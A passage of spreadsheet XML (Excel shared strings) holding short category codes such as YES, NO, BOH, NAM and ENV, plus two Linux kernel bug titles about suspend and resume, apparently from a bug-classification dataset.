  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NUM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TOT</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BUG: unable to handle kernel paging request when resuming from suspend to memory</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>radeon drm/kms: please use suspend/hibernate notifiers for allocating memory in suspend routines</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
